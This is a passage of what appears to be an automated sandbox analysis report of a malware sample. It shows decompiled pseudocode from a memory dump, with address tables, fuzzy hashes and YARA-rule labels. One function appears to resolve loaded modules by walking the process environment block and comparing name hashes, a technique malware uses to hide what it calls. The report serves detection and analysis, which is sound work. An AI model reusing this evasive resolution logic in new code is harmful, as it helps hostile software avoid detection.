									if(_t90 ==  *((intOrPtr*)(_t88 + _t107 + 8))) {
										break;
									}
									_t106 = _t106 + 1;
									_t88 = _t88 + 0x10;
									__eflags = _t106 - 0x10;
									if(_t106 < 0x10) {
										continue;
									} else {
										asm("o16 nop [eax+eax]");
										_t3 = _t107 + 0x100; // 0x0
										_t107 =  *_t3;
										__eflags = _t107;
										if(_t107 != 0) {
											goto L5;
										} else {
											goto L10;
										}
									}
									goto L74;
								}
								return  *((intOrPtr*)(_t88 + _t107 + 0xc));
								goto L74;
							}
							L11:
							_t62 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
							if(__eflags != 0) {
								_t131 = 0;
								_t63 =  *((intOrPtr*)(_t62 + 0xc));
								_t127 =  *((intOrPtr*)(_t63 + 0xc));
								_t119 =  *(_t63 + 0x10);
								while(1) {
									_t94 =  *((intOrPtr*)(_t127 + 0x30));
									_t64 = _t131;
									while(1) {
										_t108 =  *(_t94 + _t64 * 2) & 0x0000ffff;
										 *(_t135 + 4 + _t64 * 2) = _t108;
										__eflags = _t108;
										_t109 =  *(_t127 + 0x2c) & 0x0000ffff;
										if(_t108 == 0) {
											break;
										}
										_t64 = _t64 + 1;
										__eflags = _t64 - _t109;
										if(_t64 <= _t109) {
											continue;
										}
										break;
									}
									__eflags = _t109;
									_t110 = _t131;
									if(_t109 > 0) {
										_t134 = _t94;
										 *_t135 = _t119;
										_t135[0x62] = _t90;
										_t93 = _t131;
										while(1) {
											_t104 =  *((char*)(_t134 + _t110 * 2));
											__eflags = _t104 - 0x61 - 0x19;
											_t105 =  <=  ? _t104 - 0x20 : _t104;
											 *(_t135 + _t110 + 0x104) = _t105;
											__eflags = _t105;
											if(_t105 == 0) {
												break;
											}
											_t93 = _t93 + 1;
											_t110 = _t110 + 1;
											__eflags = _t93 - ( *(_t127 + 0x2c) & 0x0000ffff);
											if(_t93 < ( *(_t127 + 0x2c) & 0x0000ffff)) {
												continue;
											}
											break;
										}
										_t119 =  *_t135;
										_t131 = 0;
										__eflags = 0;
										_t90 = _t135[0x62];
									}
									_t65 = E003CD620( &(_t135[0x41]), _t110);
									__eflags = _t90 - (_t65 ^ 0x38ba5c7b);
									if(_t90 == (_t65 ^ 0x38ba5c7b)) {
										_t128 =  *(_t127 + 0x18);
										__eflags = _t128;
										if(_t128 != 0) {
											__eflags =  *0x3db26c;
											if( *0x3db26c != 0) {
												__eflags = _t90 - 0x588ab3ea;
												if(_t90 == 0x588ab3ea) {
													 *0x3db20c = _t128;
												}
											} else {
												_t132 =  *0x3db204; // 0x26607d0
												__eflags = _t132;
												if(_t132 == 0) {
													_push(0x104);
													 *0x3db26c = 1;
													_t132 = E003B1030();
													_t135 =  &(_t135[1]);
													__eflags = _t132;
													if(_t132 != 0) {
														_t120 = 0x10;
														_t135[0x61] = _t128;
														__eflags = 0;
														_t135[0x62] = _t90;
														_t91 = _t132;
														do {
															E003B8810(_t91, 0);
															 *((intOrPtr*)(_t91 + 8)) = 0;
															 *((intOrPtr*)(_t91 + 0xc)) = 0;
															_t91 = _t91 + 0x10;
															_t120 = _t120 - 1;
															__eflags = _t120;
														} while (_t120 != 0);
														_t128 = _t135[0x61];
														_t90 = _t135[0x62];
														 *(_t132 + 0x100) = 0;
													} else {
														_t132 = 0;
													}
													_t111 =  *0x3db1f4; // 0x2661568
													 *0x3db204 = _t132;
													__eflags = _t111 - 0xc139578;
													if(_t111 == 0xc139578) {
														_t70 =  *0x3db200;
														 *0x3db1f4 = 0;
														__eflags = _t70 - 0x9ccb2c38;
														if(_t70 != 0x9ccb2c38) {
															goto L49;
														} else {
															goto L57;
														}
													} else {
														_t70 =  *0x3db200;
														__eflags = _t70 - 0x9ccb2c38;
														if(_t70 == 0x9ccb2c38) {
															__eflags = _t111;
															if(_t111 != 0) {
																__eflags = 0;
																do {
																	_t124 = 0;
																	_t103 = 0;
																	while(1) {
																		__eflags =  *((intOrPtr*)(_t103 + _t111 + 8)) - 0xf271e04d;
																		if( *((intOrPtr*)(_t103 + _t111 + 8)) == 0xf271e04d) {
																			break;
																		}
																		_t124 = _t124 + 1;
																		_t103 = _t103 + 0x18;
																		__eflags = _t124 - 0x10;
																		if(_t124 < 0x10) {
																			continue;
																		} else {
																			goto L56;
																		}
																		goto L60;
																	}
																	_t70 =  *(_t103 + _t111 + 0x14);
																	goto L49;
																	L56:
																	asm("o16 nop [eax+eax]");
																	_t52 = _t111 + 0x180; // 0x26890a8
																	_t111 =  *_t52;
																	__eflags = _t111;
																} while (_t111 != 0);
															}
															goto L57;
														} else {
															L49:
															__eflags = _t70;
															if(_t70 == 0) {
																L57:
																_t115 = E003B7564(0x588ab3ea, 0x588ab3ea);
																__eflags = _t115;
																if(_t115 == 0) {
																	 *_t135 = _t115;
																	_t78 = E003B6C50(0x588ab3ea);
																	_t115 =  *_t135;
																	__eflags = _t78;
																	if(_t78 != 0) {
																		_t115 = E003B7564(0x588ab3ea, 0x588ab3ea);
																	}
																}
																__eflags = _t115;
																if(_t115 == 0) {
																	_t70 = 0;
																} else {
																	_t135 =  &(_t135[0xfffffffffffffffe]);
																	_t70 = E003B67C8(_t115, 0xf271e04d);
																}
															}
														}
													}
													L60:
													 *0x3db200 = _t70;
													 *0x3db26c = 0;
												} else {
													_t27 = _t132 + 0x100; // 0x0
													_t117 =  *_t27;
													__eflags = _t117;
													if(_t117 != 0) {
														while(1) {
															_t132 = _t117;
															_t118 =  *(_t117 + 0x100);
															__eflags = _t118;
															if(_t118 == 0) {
																goto L33;
															}
															_t132 = _t118;
															_t117 =  *(_t118 + 0x100);
															__eflags = _t117;
															if(_t117 != 0) {
																continue;
															}
															goto L33;
														}
													}
												}
												L33:
												_t112 = 0;
												_t121 = 0;
												__eflags = 0;
												while(1) {
													__eflags =  *(_t121 + _t132 + 8);
													if( *(_t121 + _t132 + 8) == 0) {
														break;
													}
													_t112 = _t112 + 1;
													_t121 = _t121 + 0x10;
													__eflags = _t112 - 0x10;
													if(_t112 < 0x10) {
														continue;
													} else {
														_push(0x104);
														_t123 = E003B1030();
														_t136 =  &(_t135[1]);
														__eflags = _t123;
														if(_t123 != 0) {
															 *_t136 = _t132;
															_t133 = _t123;
															_t136[0x61] = _t128;
															__eflags = 0;
															_t136[0x62] = _t90;
															_t92 = 0x10;
															do {
																E003B8810(_t133, 0);
																 *((intOrPtr*)(_t133 + 8)) = 0;
																 *((intOrPtr*)(_t133 + 0xc)) = 0;
																_t133 = _t133 + 0x10;
																_t92 = _t92 - 1;
																__eflags = _t92;
															} while (_t92 != 0);
															_t132 =  *_t136;
															_t128 = _t136[0x61];
															_t90 = _t136[0x62];
															 *(_t123 + 0x100) = 0;
														} else {
															_t123 = 0;
														}
														 *(_t123 + 0xc) = _t128;
														E003B8CC0(_t123,  &(_t136[1]));
														 *(_t123 + 8) = _t90;
														 *(_t132 + 0x100) = _t123;
													}
													goto L26;
												}
												_t122 = _t121 + _t132;
												 *(_t122 + 0xc) = _t128;
												E003B8CC0(_t122,  &(_t135[1]));
												 *(_t122 + 8) = _t90;
											}
										}
									} else {
										__eflags = _t127 - _t119;
										if(_t127 != _t119) {
											_t127 =  *_t127;
											continue;
										} else {
											_t128 = 0;
											__eflags = 0;
										}
									}
									L26:
									return _t128;
									goto L74;
								}
							} else {
								return  *((intOrPtr*)(_t62 + 8));
							}
						}
					} else {
						_t87 =  *0x3db20c; // 0x77120000
						if(_t87 == 0xc62baa87) {
							goto L4;
						} else {
							L3:
							return _t87;
						}
					}
				}
				L74:
			}

0x003b756e
0x003b7570
0x003b757c
0x003b78e7
0x003b78f1
0x003b78f7
0x00000000
0x003b78fd
0x003b78fd
0x003b7902
0x003b7907
0x00000000
0x003b790d
0x00000000
0x003b790d
0x003b7907
0x003b7582
0x003b7588
0x003b75a3
0x003b75a3
0x003b75a5
0x003b75d6
0x003b75d6
0x00000000
0x003b75a7
0x003b75a7
0x003b75a7
0x003b75a7
0x003b75ad
0x00000000
0x003b75af
0x003b75af
0x003b75b1
0x003b75b1
0x003b75b1
0x003b75b1
0x003b75b3
0x003b75b3
0x003b75b3
0x003b75b7
0x00000000
0x00000000
0x003b75bd
0x003b75be
0x003b75c1
0x003b75c4
0x00000000
0x003b75c6
0x003b75c6
0x003b75cc
0x003b75cc
0x003b75d2
0x003b75d4
0x00000000
0x00000000
0x00000000
0x00000000
0x003b75d4
0x00000000
0x003b75c4
0x003b7920
0x00000000
0x003b7920
0x003b75dc
0x003b75e2
0x003b75e5
0x003b75f7
0x003b75f9
0x003b75fc
0x003b75ff
0x003b7606
0x003b7606
0x003b7609
0x003b760b
0x003b760b
0x003b760f
0x003b7614
0x003b7616
0x003b761a
0x00000000
0x00000000
0x003b761c
0x003b761d
0x003b761f
0x00000000
0x00000000
0x00000000
0x003b761f
0x003b7621
0x003b7623
0x003b7625
0x003b7629
0x003b762b
0x003b762e
0x003b7635
0x003b7637
0x003b7637
0x003b763f
0x003b7648
0x003b764b
0x003b7652
0x003b7654
0x00000000
0x00000000
0x003b7656
0x003b7657
0x003b765c
0x003b765e
0x00000000
0x00000000
0x00000000
0x003b765e
0x003b7660
0x003b7663
0x003b7663
0x003b7665
0x003b7665
0x003b7673
0x003b767d
0x003b767f
0x003b769a
0x003b769d
0x003b769f
0x003b76a1
0x003b76a8
0x003b78b7
0x003b78bd
0x003b78c3
0x003b78c3
0x003b76ae
0x003b76ae
0x003b76b4
0x003b76b6
0x003b7778
0x003b777d
0x003b7789
0x003b778b
0x003b778e
0x003b7790
0x003b7798
0x003b779d
0x003b77a4
0x003b77a6
0x003b77ad
0x003b77af
0x003b77b3
0x003b77b8
0x003b77bb
0x003b77be
0x003b77c1
0x003b77c1
0x003b77c1
0x003b77c4
0x003b77cb
0x003b77d2
0x003b7792
0x003b7792
0x003b7792
0x003b77dc
0x003b77e2
0x003b77e8
0x003b77ee
0x003b7898
0x003b789d
0x003b78a7
0x003b78ac
0x00000000
0x003b78b2
0x00000000
0x003b78b2
0x003b77f4
0x003b77f4
0x003b77f9
0x003b77fe
0x003b7806
0x003b7808
0x003b780a
0x003b780c
0x003b780c
0x003b780e
0x003b7810
0x003b7810
0x003b7818
0x00000000
0x00000000
0x003b781a
0x003b781b
0x003b781e
0x003b7821
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b7821
0x003b788f
0x00000000
0x003b7823
0x003b7823
0x003b7829
0x003b7829
0x003b782f
0x003b782f
0x003b780c
0x00000000
0x003b7800
0x003b7800
0x003b7800
0x003b7802
0x003b7833
0x003b783e
0x003b7840
0x003b7842
0x003b7871
0x003b7874
0x003b7879
0x003b787c
0x003b787e
0x003b788b
0x003b788b
0x003b787e
0x003b7844
0x003b7846
0x003b7868
0x003b7848
0x003b784f
0x003b7852
0x003b7852
0x003b7846
0x003b7802
0x003b77fe
0x003b7857
0x003b7857
0x003b785c
0x003b76bc
0x003b76bc
0x003b76bc
0x003b76c2
0x003b76c4
0x003b76c6
0x003b76c6
0x003b76c8
0x003b76ce
0x003b76d0
0x00000000
0x00000000
0x003b76d2
0x003b76d4
0x003b76da
0x003b76dc
0x00000000
0x00000000
0x00000000
0x003b76dc
0x003b76c6
0x003b76c4
0x003b76de
0x003b76de
0x003b76e0
0x003b76e0
0x003b76e2
0x003b76e2
0x003b76e7
0x00000000
0x00000000
0x003b76ed
0x003b76ee
0x003b76f1
0x003b76f4
0x00000000
0x003b76f6
0x003b76f6
0x003b7700
0x003b7702
0x003b7705
0x003b7707
0x003b7714
0x003b7717
0x003b7719
0x003b7720
0x003b7722
0x003b7729
0x003b772b
0x003b772f
0x003b7734
0x003b7737
0x003b773a
0x003b773d
0x003b773d
0x003b773d
0x003b7740
0x003b7743
0x003b774a
0x003b7751
0x003b7709
0x003b7709
0x003b7709
0x003b7762
0x003b7765
0x003b776a
0x003b776d
0x003b776d
0x00000000
0x003b76f4
0x003b78ce
0x003b78d7
0x003b78da
0x003b78df
0x003b78df
0x003b76a8
0x003b7681
0x003b7681
0x003b7683
0x003b7604
0x00000000
0x003b7689
0x003b7689
0x003b7689
0x003b7689
0x003b7683
0x003b768b
0x003b7697
0x00000000
0x003b7697
0x003b75e7
0x003b75f4
0x003b75f4
0x003b75e5
0x003b758a
0x003b758a
0x003b7594
0x00000000
0x003b75a0
0x003b75a0
0x003b75a0
0x003b75a0
0x003b7594
0x003b7588
0x00000000

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b375ee9bdc73ff44496dc116101fa678e139730866a0f7321b216d4af6404a83
Instruction ID: ad5f6e5ddf6fd083bda705a82246d6715eeff1dbbdc14778dbf2cd3a2378f27a
Opcode Fuzzy Hash: b375ee9bdc73ff44496dc116101fa678e139730866a0f7321b216d4af6404a83
Instruction Fuzzy Hash: BBA1E171A086058BD7369F18D4847EAB3A6FBD4308F2AC92ED6498BB51EB709C41C781

Uniqueness

Uniqueness Score: -1.00%

Function 003C71F0, Relevance: .3, Instructions: 277
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E003C71F0(intOrPtr* __ecx, intOrPtr __esi, intOrPtr* _a4) {
				intOrPtr* _v16;
				intOrPtr* _v20;
				char _v24;
				signed int _v28;
				char* _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v52;
				intOrPtr _t108;
				char* _t111;
				char _t113;
				signed int _t114;
				char _t120;
				signed int _t124;
				signed int _t125;
				char* _t128;
				char* _t129;
				char _t132;
				char _t135;
				signed int _t136;
				intOrPtr _t139;
				intOrPtr* _t141;
				signed int _t143;
				intOrPtr _t145;
				intOrPtr* _t147;
				char* _t149;
				char _t150;
				char _t151;
				signed int _t153;
				unsigned int _t159;
				signed int _t161;
				char* _t162;
				intOrPtr _t163;
				signed int _t173;
				intOrPtr _t175;
				void* _t178;
				signed int* _t179;
				signed int _t180;
				char* _t181;
				char _t184;
				char _t185;
				intOrPtr* _t190;
				intOrPtr _t191;
				signed int _t193;
				char* _t195;
				intOrPtr _t196;
				void* _t197;
				intOrPtr _t198;
				signed int _t199;
				void* _t201;

				_t201 = (_t199 & 0xfffffff0) - 0x28;
				_t188 = __ecx;
				_t141 = _a4;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				if(_t141 == __ecx) {
					 *((intOrPtr*)(__ecx + 8)) = 0;
					 *__ecx = 0;
				} else {
					_push(4);
					_push(0);
					 *__ecx = 0;
					 *((intOrPtr*)(__ecx + 8)) = 0;
					E003B10B0();
					_t201 = _t201 + 8;
					_t145 =  *_t141;
					 *((intOrPtr*)(__ecx + 4)) = 0;
					if(_t145 != 0) {
						_t173 = (_t145 - 0x00000001 >> 0x00000001 >> 0x0000001e) + _t145 - 0x00000001 & 0xfffffffc;
						 *((intOrPtr*)(__ecx + 8)) = _t173 + 4;
						_push(0x10 + _t173 * 4);
						_t108 = E003B1030();
						_t201 = _t201 + 4;
						_t175 =  *_t141;
						 *((intOrPtr*)(__ecx + 4)) = _t108;
						 *__ecx = _t175;
						if(_t175 > 0) {
							_v16 = __ecx;
							asm("pxor xmm0, xmm0");
							_v44 = __esi;
							_t193 = 0;
							do {
								_push(8);
								_t193 = _t193 + 1;
								_t190 = E003B1030();
								_t201 = _t201 + 4;
								if(_t190 == 0) {
									_t190 = 0;
									_t143 = _t193 * 4;
								} else {
									_t178 = _t193 - 1;
									if(_t178 < 0 || _t178 >=  *_a4) {
										_t179 = 0;
										_t143 = _t193 * 4;
									} else {
										_t143 = _t193 * 4;
										_t179 =  *( *((intOrPtr*)(_a4 + 4)) + _t143 - 4);
									}
									 *_t190 = 0;
									_t180 =  *_t179;
									 *(_t190 + 4) = 0;
									if(_t180 == 0 ||  *_t180 == 0) {
										_push(0x40);
										_t111 = E003B1030();
										_v52 = _t111;
										_t201 = _t201 + 4;
										_t181 =  *_t190;
										if(_t181 == 0) {
											 *_t111 = 0;
										} else {
											if(_v52 != 0) {
												_t149 = _t111;
												_t113 =  *_t181;
												 *_t149 = _t113;
												if(_t113 != 0) {
													_v28 = _t193;
													_t114 = 0;
													_v20 = _t190;
													_t195 = _t149;
													while(1) {
														_t114 = _t114 + 1;
														_t150 =  *((char*)(_t181 + _t114 * 2 - 1));
														 *((char*)(_t195 + _t114 * 2 - 1)) = _t150;
														if(_t150 == 0) {
															break;
														}
														_t151 =  *((char*)(_t181 + _t114 * 2));
														 *((char*)(_t195 + _t114 * 2)) = _t151;
														if(_t151 != 0) {
															continue;
														}
														break;
													}
													_t190 = _v20;
													_t193 = _v28;
												}
											}
											_push(1);
											_push(_t181);
											E003B10B0();
											_t201 = _t201 + 8;
										}
										 *_t190 = _v52;
										 *(_t190 + 4) = 0x40;
									} else {
										_t153 = _t180 & 0x0000000f;
										if(_t153 == 0) {
											L15:
											asm("pxor xmm1, xmm1");
											_t120 =  ~( ~_t153 + 0x0000000f & 0x0000000f) + 0x7fffffff;
											_v24 = _t120;
											_v28 = _t193;
											_t196 = _t120;
											while(1) {
												asm("movdqu xmm0, [edx+ecx]");
												asm("pcmpeqb xmm0, xmm1");
												asm("pmovmskb eax, xmm0");
												if(_t120 != 0) {
													break;
												}
												_t153 = _t153 + 0x10;
												if(_t153 < _t196) {
													continue;
												} else {
													_v24 = _t196;
													_t193 = _v28;
													if(_v24 >= 0x7fffffff) {
														L22:
														_v24 = 0x7fffffff;
													} else {
														_t163 = _v24;
														while( *((char*)(_t163 + _t180)) != 0) {
															_t163 = _t163 + 1;
															if(_t163 < 0x7fffffff) {
																continue;
															} else {
																goto L22;
															}
															goto L23;
														}
														_v24 = _t163;
													}
												}
												goto L23;
											}
											asm("bsf eax, eax");
											_t193 = _v28;
											_v24 = _t120 + _t153;
										} else {
											_v24 = 0;
											_t139 = _v24;
											_t153 =  ~_t153 + 0x10;
											while( *((char*)(_t139 + _t180)) != 0) {
												_t139 = _t139 + 1;
												if(_t139 < _t153) {
													continue;
												} else {
													goto L15;
												}
												goto L23;
											}
											_v24 = _t139;
										}
										L23:
										_t124 =  <=  ? 0x40 : _v24 + 1;
										if(_t124 > 0) {
											_t159 = (_t124 >> 5 >> 0x1a) + _t124 >> 6;
											_v36 = _t159;
											_t125 = _t124 & 0x8000003f;
											if(_t125 < 0) {
												_t125 = (_t125 - 0x00000001 | 0xffffffc0) + 1;
											}
											_t161 = _t159 + (0 | _t125 > 0x00000000) << 6;
											_v36 = _t161;
											_push(_t161);
											_v40 = _t180;
											_t128 = E003B1030();
											_t180 = _v40;
											_t162 = _t128;
											_t201 = _t201 + 4;
											_t129 =  *_t190;
											_v32 = _t129;
											if(_t129 == 0) {
												 *_t162 = 0;
											} else {
												if(_t162 != 0) {
													_t135 =  *_t129;
													 *_t162 = _t135;
													if(_t135 != 0) {
														_v28 = _t193;
														_t136 = 0;
														_v20 = _t190;
														_v40 = _t180;
														_t198 = _v32;
														while(1) {
															_t136 = _t136 + 1;
															_t184 =  *((char*)(_t198 + _t136 * 2 - 1));
															 *((char*)(_t162 + _t136 * 2 - 1)) = _t184;
															if(_t184 == 0) {
																break;
															}
															_t185 =  *((char*)(_t198 + _t136 * 2));
															 *((char*)(_t162 + _t136 * 2)) = _t185;
															if(_t185 != 0) {
																continue;
															}
															break;
														}
														_t190 = _v20;
														_t180 = _v40;
														_t193 = _v28;
													}
												}
												_push(1);
												_push(_v32);
												_v48 = _t162;
												_v40 = _t180;
												E003B10B0();
												_t180 = _v40;
												_t162 = _v48;
												_t201 = _t201 + 8;
											}
											 *(_t190 + 4) = _v36;
											 *_t190 = _t162;
										} else {
											_t162 = 0;
										}
										if(_t162 != 0) {
											_v20 = _t190;
											_v28 = _t193;
											_t197 = 0;
											_t191 = _v24;
											while(1) {
												_t197 = _t197 + 1;
												_t132 =  *((char*)(_t197 + _t180 - 1));
												 *((char*)(_t197 + _t162 - 1)) = _t132;
												if(_t191 != 0 && _t197 == _t191) {
													break;
												}
												if(_t132 != 0) {
													continue;
												} else {
													_t190 = _v20;
													_t193 = _v28;
												}
												goto L54;
											}
											_t190 = _v20;
											_t193 = _v28;
											 *((char*)(_t197 + _t162)) = 0;
										}
									}
								}
								L54:
								_t147 = _v16;
								 *((intOrPtr*)(_t143 +  *((intOrPtr*)(_t147 + 4)) - 4)) = _t190;
							} while (_t193 <  *_t147);
							_t188 = _t147;
						}
					}
				}
				return _t188;
			}

0x003c71f8
0x003c71fb
0x003c71fd
0x003c7200
0x003c7209
0x003c754f
0x003c7552
0x003c720f
0x003c720f
0x003c7213
0x003c7214
0x003c7216
0x003c7219
0x003c721e
0x003c7221
0x003c7223
0x003c722c
0x003c723e
0x003c7244
0x003c724e
0x003c724f
0x003c7254
0x003c7257
0x003c7259
0x003c725c
0x003c7260
0x003c7268
0x003c726c
0x003c7270
0x003c7274
0x003c7276
0x003c7276
0x003c7278
0x003c727e
0x003c7280
0x003c7285
0x003c74ea
0x003c74ec
0x003c728b
0x003c728d
0x003c728e
0x003c7297
0x003c7299
0x003c72a2
0x003c72a5
0x003c72af
0x003c72af
0x003c72b5
0x003c72b7
0x003c72b9
0x003c72be
0x003c7478
0x003c747a
0x003c747f
0x003c7483
0x003c7486
0x003c748a
0x003c74d9
0x003c748c
0x003c7490
0x003c7492
0x003c7494
0x003c7497
0x003c749b
0x003c749d
0x003c74a1
0x003c74a3
0x003c74a7
0x003c74a9
0x003c74a9
0x003c74aa
0x003c74af
0x003c74b5
0x00000000
0x00000000
0x003c74b7
0x003c74bb
0x003c74c0
0x00000000
0x00000000
0x00000000
0x003c74c0
0x003c74c2
0x003c74c6
0x003c74c6
0x003c749b
0x003c74ca
0x003c74cc
0x003c74cd
0x003c74d2
0x003c74d2
0x003c74df
0x003c74e1
0x003c72cd
0x003c72cf
0x003c72d2
0x003c72f4
0x003c72f8
0x003c7304
0x003c7309
0x003c730d
0x003c7311
0x003c7313
0x003c7313
0x003c7318
0x003c731c
0x003c7322
0x00000000
0x00000000
0x003c7328
0x003c732d
0x00000000
0x003c732f
0x003c732f
0x003c7333
0x003c733f
0x003c7358
0x003c7358
0x003c7341
0x003c7341
0x003c7345
0x003c734f
0x003c7356
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c7356
0x003c7529
0x003c7529
0x003c733f
0x00000000
0x003c732d
0x003c7532
0x003c7537
0x003c753b
0x003c72d4
0x003c72d4
0x003c72de
0x003c72e2
0x003c72e5
0x003c72ef
0x003c72f2
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c72f2
0x003c7544
0x003c7544
0x003c7360
0x003c736f
0x003c7374
0x003c7387
0x003c738a
0x003c738e
0x003c7393
0x003c739b
0x003c739b
0x003c73a8
0x003c73ab
0x003c73af
0x003c73b0
0x003c73b4
0x003c73b9
0x003c73bd
0x003c73bf
0x003c73c2
0x003c73c4
0x003c73ca
0x003c7430
0x003c73cc
0x003c73ce
0x003c73d0
0x003c73d3
0x003c73d7
0x003c73d9
0x003c73dd
0x003c73df
0x003c73e3
0x003c73e7
0x003c73eb
0x003c73eb
0x003c73ec
0x003c73f1
0x003c73f7
0x00000000
0x00000000
0x003c73f9
0x003c73fd
0x003c7402
0x00000000
0x00000000
0x00000000
0x003c7402
0x003c7404
0x003c7408
0x003c740c
0x003c740c
0x003c73d7
0x003c7410
0x003c7412
0x003c7416
0x003c741a
0x003c741e
0x003c7423
0x003c7427
0x003c742b
0x003c742b
0x003c7437
0x003c743a
0x003c7376
0x003c7376
0x003c7376
0x003c743e
0x003c7446
0x003c744a
0x003c744e
0x003c7450
0x003c7454
0x003c7454
0x003c7455
0x003c745a
0x003c7460
0x00000000
0x00000000
0x003c746c
0x00000000
0x003c746e
0x003c746e
0x003c7472
0x003c7472
0x00000000
0x003c746c
0x003c751b
0x003c751f
0x003c7523
0x003c7523
0x003c743e
0x003c72be
0x003c74f3
0x003c74f3
0x003c74fa
0x003c74fe
0x003c7506
0x003c7508
0x003c7260
0x003c722c
0x003c7516

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d429c3ac184809212723adcbd6e746b65124195a74a52075ee5fe463380fc44
Instruction ID: 8b7549411d2359dae614d9f81b18453e731126cc9215eaa75540e992bbc9c38a
Opcode Fuzzy Hash: 2d429c3ac184809212723adcbd6e746b65124195a74a52075ee5fe463380fc44
Instruction Fuzzy Hash: A7B17CB45087428BD71ACF29C450B2ABBE1BF95310F188A6DE895CB351E735DD46CF82

Uniqueness

Uniqueness Score: -1.00%

Function 003BE0A0, Relevance: .3, Instructions: 273
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E003BE0A0(signed int* __ecx, signed int _a4, intOrPtr _a8) {
				signed int _v32;
				intOrPtr* _v36;
				signed short** _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed short* _t98;
				signed int _t101;
				unsigned int _t107;
				signed int _t108;
				signed int* _t110;
				signed int _t112;
				signed int _t120;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				signed int _t126;
				signed short** _t127;
				signed int _t128;
				signed int _t132;
				signed short* _t136;
				unsigned int _t144;
				signed int _t149;
				signed int _t150;
				signed short* _t155;
				void* _t158;
				signed int _t173;
				signed int _t175;
				intOrPtr* _t177;
				signed int _t179;
				signed int _t180;
				unsigned int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				void* _t188;
				void* _t189;

				_t188 = (_t186 & 0xfffffff0) - 0x24;
				_t177 = __ecx;
				_t172 =  <=  ? 0 : _a8;
				_t132 =  *__ecx;
				_t126 = __ecx[2];
				_t120 = _a4;
				_t173 =  <  ? _t132 :  <=  ? 0 : _a8;
				if(_t132 == _t126) {
					__ecx[2] = _t126 + 4;
					_push(0x10 + _t126 * 4);
					_v52 = E003B1030();
					E003B0C10(_v52, __ecx[1],  *__ecx << 2);
					_push(4);
					_push(__ecx[1]);
					E003B10B0();
					_t188 = _t188 + 0x18;
					__ecx[1] = _v52;
					_t132 =  *__ecx;
				}
				_t133 = _t132 != _t173;
				if(_t132 != _t173) {
					E003B0BC0( &(( *((intOrPtr*)(_t177 + 4)) + _t173 * 4)[1]),  *((intOrPtr*)(_t177 + 4)) + _t173 * 4, _t133 << 2);
					_t188 = _t188 + 0xc;
				}
				_push(8);
				_t127 = E003B1030();
				_t189 = _t188 + 4;
				if(_t127 == 0) {
					_t127 = 0;
				} else {
					 *_t127 = 0;
					_t127[1] = 0;
					if(_t120 == 0 || ( *_t120 & 0x0000ffff) == 0) {
						_push(0x80);
						_v40 = _t127;
						_t98 = E003B1030();
						_t127 = _v40;
						_t189 = _t189 + 4;
						_t136 =  *_t127;
						if(_t136 == 0) {
							 *_t98 = 0;
						} else {
							if(_t98 != 0) {
								_t122 =  *_t136 & 0x0000ffff;
								 *_t98 = _t122;
								if(_t122 != 0) {
									_v36 = _t177;
									_t123 = 0;
									while(1) {
										_t123 = _t123 + 1;
										_t179 =  *(_t136 + _t123 * 4 - 2) & 0x0000ffff;
										 *(_t98 + _t123 * 4 - 2) = _t179;
										if(_t179 == 0) {
											break;
										}
										_t180 =  *(_t136 + _t123 * 4) & 0x0000ffff;
										 *(_t98 + _t123 * 4) = _t180;
										if(_t180 != 0) {
											continue;
										}
										break;
									}
									_t177 = _v36;
								}
							}
							_push(2);
							_push(_t136);
							_v40 = _t127;
							_v52 = _t98;
							E003B10B0();
							_t98 = _v52;
							_t127 = _v40;
							_t189 = _t189 + 8;
						}
						 *_t127 = _t98;
						_t127[1] = 0x40;
					} else {
						_t101 = _t120 & 0x0000000f;
						if(_t101 == 0) {
							L13:
							asm("pxor xmm0, xmm0");
							_t144 =  ~( ~_t101 + 0x00000007 & 0x00000007) + 0x7fffffff;
							_v32 = _t144;
							_v36 = _t177;
							_t181 = _t144;
							while(1) {
								asm("movdqu xmm1, [ebx+eax*2]");
								asm("pcmpeqw xmm1, xmm0");
								asm("pmovmskb edx, xmm1");
								if(_t144 != 0) {
									break;
								}
								_t101 = _t101 + 8;
								if(_t101 < _t181) {
									continue;
								} else {
									_v32 = _t181;
									_t177 = _v36;
									if(_v32 >= 0x7fffffff) {
										goto L20;
									} else {
										goto L17;
									}
								}
								goto L21;
							}
							asm("bsf edx, edx");
							_t177 = _v36;
							_v32 = (_t144 >> 1) + _t101;
						} else {
							_v32 = 0;
							if((_t101 & 0x00000001) != 0) {
								L17:
								_t112 = _v32;
								while(( *(_t120 + _t112 * 2) & 0x0000ffff) != 0) {
									_t112 = _t112 + 1;
									if(_t112 < 0x7fffffff) {
										continue;
									} else {
										L20:
										_v32 = 0x7fffffff;
									}
									goto L21;
								}
								_v32 = _t112;
							} else {
								_v36 = _t177;
								_t101 =  ~_t101 + 0x10 >> 1;
								_t185 = _v32;
								while(( *(_t120 + _t185 * 2) & 0x0000ffff) != 0) {
									_t185 = _t185 + 1;
									if(_t185 < _t101) {
										continue;
									} else {
										_t177 = _v36;
										goto L13;
									}
									goto L21;
								}
								_v32 = _t185;
								_t177 = _v36;
							}
						}
						L21:
						_t149 =  <=  ? 0x40 : _v32 + 1;
						if(_t149 > 0) {
							_t107 = (_t149 >> 5 >> 0x1a) + _t149 >> 6;
							_t150 = _t149 & 0x8000003f;
							if(_t150 < 0) {
								_t150 = (_t150 - 0x00000001 | 0xffffffc0) + 1;
							}
							_t108 = _t107 + (0 | _t150 > 0x00000000);
							_v44 = _t108 << 6;
							_push(_t108 << 7);
							_v40 = _t127;
							_t110 = E003B1030();
							_t127 = _v40;
							_t189 = _t189 + 4;
							_t155 =  *_t127;
							if(_t155 == 0) {
								 *_t110 = 0;
							} else {
								if(_t110 != 0) {
